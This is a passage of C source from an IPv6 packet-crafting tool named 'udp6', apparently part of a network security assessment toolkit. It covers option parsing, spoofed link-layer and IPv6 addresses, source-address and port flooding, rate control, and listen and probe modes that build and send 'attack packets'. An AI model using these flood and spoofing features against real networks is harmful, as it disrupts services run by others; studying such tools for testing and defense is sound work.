exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; idata.fragh_f= 1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'P': /* Payload Size*/ rhbytes= atoi(optarg); rhbytes_f= 1; break; case 'o': /* UDP Source Port */ srcport= atoi(optarg); srcport_f= 1; break; case 'a': /* UDP Destination Port */ dstport= atoi(optarg); dstport_f= 1; break; case 'j': /* IPv6 Source Address (block) filter */ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocksrc[filters.nblocksrc])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocksrclen[filters.nblocksrc] = 128; } else{ filters.blocksrclen[filters.nblocksrc] = atoi(charptr); if(filters.blocksrclen[filters.nblocksrc]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocksrc[filters.nblocksrc]), filters.blocksrclen[filters.nblocksrc]); (filters.nblocksrc)++; break; case 'k': /* IPv6 Destination Address (block) filter */ if(filters.nblockdst >= MAX_BLOCK_DST){ puts("Too many IPv6 Destination Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blockdst[filters.nblockdst])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blockdstlen[filters.nblockdst] = 128; } else{ filters.blockdstlen[filters.nblockdst] = atoi(charptr); if(filters.blockdstlen[filters.nblockdst]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blockdst[filters.nblockdst]), filters.blockdstlen[filters.nblockdst]); (filters.nblockdst)++; break; case 'J': /* Link Source Address (block) filter */ if(filters.nblocklinksrc > MAX_BLOCK_LINK_SRC){ puts("Too many link-layer Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinksrc[filters.nblocklinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (blick) filter number %u.\n", \ filters.nblocklinksrc+1); exit(EXIT_FAILURE); } (filters.nblocklinksrc)++; break; case 'K': /* Link Destination Address (block) filter */ if(filters.nblocklinkdst > MAX_BLOCK_LINK_DST){ puts("Too many link-layer Destination Address (block) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinkdst[filters.nblocklinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (blick) filter number %u.\n", \ filters.nblocklinkdst+1); exit(EXIT_FAILURE); } filters.nblocklinkdst++; break; case 'b': /* IPv6 Source Address (accept) filter */ if(filters.nacceptsrc > MAX_ACCEPT_SRC){ puts("Too many IPv6 Source Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptsrc[filters.nacceptsrc])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptsrclen[filters.nacceptsrc] = 128; } else{ filters.acceptsrclen[filters.nacceptsrc] = atoi(charptr); if(filters.acceptsrclen[filters.nacceptsrc]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptsrc[filters.nacceptsrc]), filters.acceptsrclen[filters.nacceptsrc]); (filters.nacceptsrc)++; filters.acceptfilters_f=1; break; case 'g': /* IPv6 Destination Address (accept) filter */ if(filters.nacceptdst > MAX_ACCEPT_DST){ puts("Too many IPv6 Destination Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptdst[filters.nacceptdst])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptdstlen[filters.nacceptdst] = 128; } else{ filters.acceptdstlen[filters.nacceptdst] = atoi(charptr); if(filters.acceptdstlen[filters.nacceptdst] > 128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptdst[filters.nacceptdst]), filters.acceptdstlen[filters.nacceptdst]); (filters.nacceptdst)++; filters.acceptfilters_f=1; break; case 'B': /* Link-layer Source Address (accept) filter */ if(filters.nacceptlinksrc > MAX_ACCEPT_LINK_SRC){ puts("Too many link-later Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinksrc[filters.nacceptlinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (accept) filter number %u.\n", \ filters.nacceptlinksrc+1); exit(EXIT_FAILURE); } (filters.nacceptlinksrc)++; filters.acceptfilters_f=1; break; case 'G': /* Link Destination Address (accept) filter */ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinkdst[filters.nacceptlinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (accept) filter number %u.\n",\ filters.nacceptlinkdst+1); exit(EXIT_FAILURE); } (filters.nacceptlinkdst)++; filters.acceptfilters_f=1; break; case 'F': /* Flood source addresses */ nsources= atoi(optarg); if(nsources == 0){ puts("Invalid number of source addresses in option -F"); exit(EXIT_FAILURE); } floods_f= 1; break; case 'T': /* Flood source ports */ nports= atoi(optarg); if(nports == 0){ puts("Invalid number of source ports in option -T"); exit(EXIT_FAILURE); } floodp_f= 1; break; case 'f': rand_src_f=1; break; case 'R': rand_link_src_f=1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'r': if( Strnlen(optarg, LINE_BUFFER_SIZE-1) >= (LINE_BUFFER_SIZE-1)){ puts("udp6: -r option is too long"); exit(EXIT_FAILURE); } sscanf(optarg, "%lu%s", &rate, line); line[LINE_BUFFER_SIZE-1]=0; if(strncmp(line, "pps", 3) == 0) pps_f=1; else if(strncmp(line, "bps", 3) == 0) bps_f=1; else{ puts("udp6: Unknown unit of for the rate limit ('-r' option). Unit should be 'bps' or 'pps'"); exit(EXIT_FAILURE); } break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'L': /* "Listen mode */ listen_f = 1; break; case 'p': /* Probe mode */ if(strncmp(optarg, "dump", MAX_CMDLINE_OPT_LEN) == 0){ probemode= PROBE_DUMP; } else if(strncmp(optarg, "script", MAX_CMDLINE_OPT_LEN) == 0){ probemode= PROBE_SCRIPT; } else{ puts("Error: Unknown open mode in '-Y' option"); exit(EXIT_FAILURE); } probemode_f=1; break; case 'x': /* Number of retrnasmissions */ retrans= atoi(optarg); retrans_f=1; break; case 'v': /* Be verbose */ (idata.verbose_f)++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("udp6 needs root privileges to run."); exit(EXIT_FAILURE); } srandom(time(NULL)); /* If the flood option ("-F") has been specified, but no prefix has been specified, assume a /64 prefix. */ if(floods_f && !idata.srcprefix_f){ idata.srcpreflen=64; } if(idata.srcprefix_f && !floods_f && loop_f){ floods_f=1; nsources= 1; } if(!(idata.dstaddr_f) && !listen_f){ /* Must specify IPv6 Destination Address if listening mode not used */ puts("IPv6 Destination Address not specified (and listening mode not selected)"); exit(EXIT_FAILURE); } if(rhbytes_f && data_f){ puts("Cannot set '--data' and '--payload-size' at the same time"); exit(EXIT_FAILURE); } if(!idata.iface_f){ if(idata.dstaddr_f && IN6_IS_ADDR_LINKLOCAL(&(idata.dstaddr))){ puts("Must specify a network interface for link-local destinations"); exit(EXIT_FAILURE); } else if(listen_f){ puts("Must specify a network interface when employing the 'listenging' mode"); exit(EXIT_FAILURE); } } if(load_dst_and_pcap(&idata, (idata.dstaddr_f?LOAD_SRC_NXT_HOP:LOAD_PCAP_ONLY)) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if(data_f){ data[datalen]=0; if(!string_escapes(data, &datalen, DATA_BUFFER_LEN-1)){ puts("Error in data string option ('-Z')"); exit(EXIT_FAILURE); } data[datalen]=0; } if(!floods_f) nsources=1; if(!floodp_f) nports=1; if(!sleep_f) nsleep=1; if(sleep_f && (pps_f || bps_f)){ puts("Cannot specify a rate-limit (-r) and a sleep time at the same time"); exit(EXIT_FAILURE); } if(pps_f && bps_f){ puts("Cannot specify a rate-limit in bps and pps at the same time"); exit(EXIT_FAILURE); } if(pps_f){ if(rate < 1) rate=1; pktinterval= 1000000/rate; } if(bps_f){ packetsize= MIN_IPV6_HLEN + sizeof(struct udp_hdr) + rhbytes; for(i=0; i < ndstopthdr; i++) packetsize+= dstopthdrlen[i]; for(i=0; i < ndstoptuhdr; i++) packetsize+= dstoptuhdrlen[i]; for(i=0; i < nhbhopthdr; i++) packetsize+= hbhopthdrlen[i]; if(idata.fragh_f) packetsize+= sizeof(struct ip6_frag); if(rate == 0 || ((packetsize * 8)/rate) <= 0) pktinterval= 1000000; else pktinterval= ((packetsize * 8)/rate) * 1000000; } /* We Default to 1000 pps */ if(!pps_f && !bps_f) pktinterval= 1000; if( !idata.fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } /* * If we are going to send packets to a specified target, we must set some default values */ if(idata.dstaddr_f){ if(!srcport_f) srcport= random(); if(!dstport_f) dstport= random(); } if(!rhbytes_f) rhbytes=0; if(idata.verbose_f){ print_attack_info(&idata); } /* Set filter for IPv6 packets (find_ipv6_router() set its own filter fore receiving RAs) */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_UDPIPV6_NS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); /* Set initial contents of the attack packet */ init_packet_data(&idata); addr_key= random(); if(sleep_f) pktinterval= (nsleep * 1000000)/(nsources * nports); timeout.tv_sec= pktinterval / 1000000 ; timeout.tv_usec= pktinterval % 1000000; stimeout= timeout; if(probemode_f){ end_f=0; if(!dstport_f) dstport= 80; if(!srcport_f) srcport= 50000 + random() % 15000; /* We select ports from the "high ports" range */ if(!rto_f) rto=1; if(!retrans_f) retrans=0; retr=0; retrans++; FD_ZERO(&sset); FD_SET(idata.fd, &sset); lastprobe.tv_sec= 0; lastprobe.tv_usec=0; while(!end_f){ if(gettimeofday(&curtime, NULL) == -1){ if(idata.verbose_f) perror("udp6"); exit(EXIT_FAILURE); } if(is_time_elapsed(&curtime, &lastprobe, rto * 1000000) && retr < retrans){ retr++; lastprobe= curtime; send_packet(&idata, NULL, NULL); } if(is_time_elapsed(&curtime, &lastprobe, rto * 1000000) && retr >= retrans){ end_f=1; break; } rset= sset; timeout.tv_usec=0; timeout.tv_sec= (rto < 1)?rto:1; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } #if !defined(sun) && !defined(__sun) && !defined(__linux__) if(sel && FD_ISSET(idata.fd, &rset)){ #else if(TRUE){ #endif /* Read a packet */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_udp= (struct udp_hdr *) ( (char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_ns= (struct nd_neighbor_solicit *) ( (char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* Some preliminar sanity checks. */ /* XXX: Might need/could remove some of the checks below */ if(!is_valid_udp_datagram(&idata, pktdata, pkthdr)) continue; /* Check that we are able to look into the IPv6 header */ if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; if(is_eq_in6_addr(&(pkt_ipv6->ip6_src), &(idata.srcaddr))){ continue; } if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.srcaddr))){ continue; } if(pkt_udp->uh_sport != htons(dstport)){ continue; } if(pkt_udp->uh_dport != htons(srcport)){ continue; } /* The UDP checksum must be valid */ if(in_chksum(pkt_ipv6, pkt_udp, pkt_end-((unsigned char *)pkt_udp), IPPROTO_UDP) != 0) continue; printf("RESPONSE:UDP6\n"); exit(EXIT_SUCCESS); } } } puts("RESPONSE:TIMEOUT:"); exit(EXIT_SUCCESS); } /* Fire a UDP packet if an IPv6 Destination Address was specified */ if(!listen_f && idata.dstaddr_f){ if(loop_f){ if(idata.verbose_f) printf("Sending UDP datagrams every %u second%s...\n", nsleep, \ ((nsleep>1)?"s":"")); } do{ send_packet(&idata, NULL, NULL); if(loop_f && (sel=select(0, NULL, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } }while(loop_f); if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); exit(EXIT_SUCCESS); } else if(listen_f){ FD_ZERO(&sset); FD_SET(idata.fd, &sset); if(idata.verbose_f){ print_filters(&idata, &filters); puts("Listening to incoming UDP datagrams..."); } while(listen_f){ rset= sset; timeout= stimeout; /* XXX: need to address the select() thing */ #if !defined(sun) && !defined(__sun) && !defined(__linux__) if((sel=select(idata.fd+1, &rset, NULL, NULL, ((floods_f || floodp_f) && !donesending_f)?(&timeout):NULL)) == -1){ #else timeout.tv_usec=10000; timeout.tv_sec= 0; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ #endif if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } /* If there are some bits set, we need to check whether it's time to send packets */ #if !defined(sun) && !defined(__sun) && !defined(__linux__) if(sel){ #else if(TRUE){ #endif if(gettimeofday(&curtime, NULL) == -1){ if(idata.verbose_f) perror("udp6"); exit(EXIT_FAILURE); } } #if !defined(sun) && !defined(__sun) && !defined(__linux__) if(sel && FD_ISSET(idata.fd, &rset)){ #else if(TRUE){ #endif /* Read a packet */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_udp= (struct udp_hdr *) ( (char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_ns= (struct nd_neighbor_solicit *) ( (char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* Check that we are able to look into the IPv6 header */ if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; accepted_f=0; if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(filters.nblocklinksrc){ if(match_ether(filters.blocklinksrc, filters.nblocklinksrc, &(pkt_ether->src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocklinkdst){ if(match_ether(filters.blocklinkdst, filters.nblocklinkdst, &(pkt_ether->dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } } if(filters.nblocksrc){ if(match_ipv6(filters.blocksrc, filters.blocksrclen, filters.nblocksrc, &(pkt_ipv6->ip6_src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblockdst){ if(match_ipv6(filters.blockdst, filters.blockdstlen, filters.nblockdst, &(pkt_ipv6->ip6_dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(filters.nacceptlinksrc){ if(match_ether(filters.acceptlinksrc, filters.nacceptlinksrc, &(pkt_ether->src))) accepted_f=1; } if(filters.nacceptlinkdst && !accepted_f){ if(match_ether(filters.acceptlinkdst, filters.nacceptlinkdst, &(pkt_ether->dst))) accepted_f= 1; } } if(filters.nacceptsrc && !accepted_f){ if(match_ipv6(filters.acceptsrc, filters.acceptsrclen, filters.nacceptsrc, &(pkt_ipv6->ip6_src))) accepted_f= 1; } if(filters.nacceptdst && !accepted_f){ if(match_ipv6(filters.acceptdst, filters.acceptdstlen, filters.nacceptdst, &(pkt_ipv6->ip6_dst))) accepted_f=1; } if(filters.acceptfilters_f && !accepted_f){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } if(idata.verbose_f>1) print_filter_result(&idata, pktdata, ACCEPTED); if(pkt_ipv6->ip6_nxt == IPPROTO_UDP){ /* Some preliminar sanity checks. */ /* XXX: Might need/could remove some of the checks below */ if(!is_valid_udp_datagram(&idata, pktdata, pkthdr)) continue; /* Check that we are able to look into the UDP header */ if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN + sizeof(struct udp_hdr))){ continue; } if(idata.dstaddr_f){ if(!floods_f){ /* Discard our own packets */ if(is_eq_in6_addr(&(pkt_ipv6->ip6_src), &(idata.srcaddr))){ continue; } if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.srcaddr))){ continue; } } else{ /* Discard our own packets */ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_src), &(idata.dstaddr))){ continue; } if(useaddrkey_f){ if( (ntohl(pkt_ipv6->ip6_src.s6_addr32[2]) & 0x0000ffff) == ( (uint16_t)(ntohl(pkt_ipv6->ip6_src.s6_addr32[2])>>16) ^ addr_key) && \ (ntohl(pkt_ipv6->ip6_src.s6_addr32[3]) & 0x0000ffff) == ( (uint16_t)(ntohl(pkt_ipv6->ip6_src.s6_addr32[3])>>16) ^ addr_key)){ continue; } if( (ntohl(pkt_ipv6->ip6_dst.s6_addr32[2]) & 0x0000ffff) != ((uint16_t)(ntohl(pkt_ipv6->ip6_dst.s6_addr32[2]) >> 16) ^ addr_key) || \ (ntohl(pkt_ipv6->ip6_dst.s6_addr32[3]) & 0x0000ffff) != ((uint16_t)(ntohl(pkt_ipv6->ip6_dst.s6_addr32[3])>>16) ^ addr_key)){ continue; } } } /* The UDP checksum must be valid */ if(in_chksum(pkt_ipv6, pkt_udp, pkt_end-((unsigned char *)pkt_udp), IPPROTO_UDP) != 0) continue; if(pkt_udp->uh_sport != htons(dstport)){ continue; } if(!floodp_f && pkt_udp->uh_dport != htons(srcport)){ continue; } } /* Send a UDP datagram */ send_packet(&idata, pktdata, pkthdr); } else if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ /* Check that we are able to look into the NS header */ if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN + sizeof(struct nd_neighbor_solicit))){ continue; } if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(floods_f){ if(useaddrkey_f){ if( (ntohl(pkt_ns->nd_ns_target.s6_addr32[2]) & 0x0000ffff) != ( (ntohl(pkt_ns->nd_ns_target.s6_addr32[2]) >>16) ^ addr_key) || \ (ntohl(pkt_ns->nd_ns_target.s6_addr32[3]) & 0x0000ffff) != ( (ntohl(pkt_ns->nd_ns_target.s6_addr32[3]) >>16) ^ addr_key)){ continue; } } /* Check that the target address belongs to the prefix from which we are sending packets */ if(!match_ipv6(&(idata.srcaddr), &idata.srcpreflen, 1, &(pkt_ns->nd_ns_target))){ continue; } } else{ if(!is_eq_in6_addr( &(pkt_ns->nd_ns_target), &(idata.srcaddr)) ){ continue; } } if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } } } if(idata.dstaddr_f && !donesending_f && is_time_elapsed(&curtime, &lastprobe, pktinterval)){ lastprobe= curtime; send_packet(&idata, NULL, NULL); } } exit(EXIT_SUCCESS); } if(!(idata.dstaddr_f) && !listen_f){ puts("Error: Nothing to send! (Destination Address left unspecified, and not using listening mode)"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ struct dlt_null *dlt_null; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(idata->fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+idata->mtu)){ puts("Unfragmentable part too large for current MTU"); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ memset(&fraghdr, 0, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_UDP; startofprefixes=ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the UDP datagram, and send the attack packet(s). */ void send_packet(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr *pkthdr){ static unsigned int sources=0, ports=0; ptr=startofprefixes; senddata_f= 0; if(pktdata != NULL){ /* Sending an UDP datagram in response to a received packet */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_udp= (struct udp_hdr *)( (char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr) + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr) + pkt_ipv6->ip6_plen; pkt_ipv6addr = &(pkt_ipv6->ip6_src); /* We don't send any packets if the Source Address of the captured packet is the unspecified address or a multicast address */ if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr) || IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ return; } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK)) ethernet->dst = pkt_ether->src; } pkt_ipv6addr = &(pkt_ipv6->ip6_dst); /* We do not send any packets if the Destination Address of the captured packet is the unspecified address or a multicast address */ if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr) || IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ return; } else{ ipv6->ip6_src = pkt_ipv6->ip6_dst; if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK)) ethernet->src = pkt_ether->dst; } if( (ptr+sizeof(struct udp_hdr)) > (v6buffer+ idata->max_packet_size)){ puts("Packet Too Large while inserting UDP header"); exit(EXIT_FAILURE); } udp = (struct udp_hdr *) ptr; memset(udp, 0, sizeof(struct udp_hdr)); udp->uh_sport= pkt_udp->uh_dport; udp->uh_dport= pkt_udp->uh_sport; ptr+= sizeof(struct udp_hdr); if(rhbytes_f){ if( (ptr + rhbytes) > v6buffer+ idata->max_packet_size){ puts("Packet Too Large while inserting UDP datagram"); exit(EXIT_FAILURE); } while(rhbytes>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhbytes -= sizeof(uint32_t); } while(rhbytes>0){ *(uint8_t *) ptr= (uint8_t) random(); ptr++; rhbytes--; } } else 